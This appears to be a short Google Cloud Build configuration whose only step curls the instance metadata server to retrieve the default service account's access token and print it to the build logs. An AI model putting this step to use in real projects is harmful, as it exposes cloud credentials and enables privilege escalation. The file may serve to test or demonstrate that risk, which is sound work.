steps:
  - name: 'ubuntu'
    args: ['bash', '-c', 'curl -H "Metadata-Flavor:Google" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token']

options:
  logging: CLOUD_LOGGING_ONLY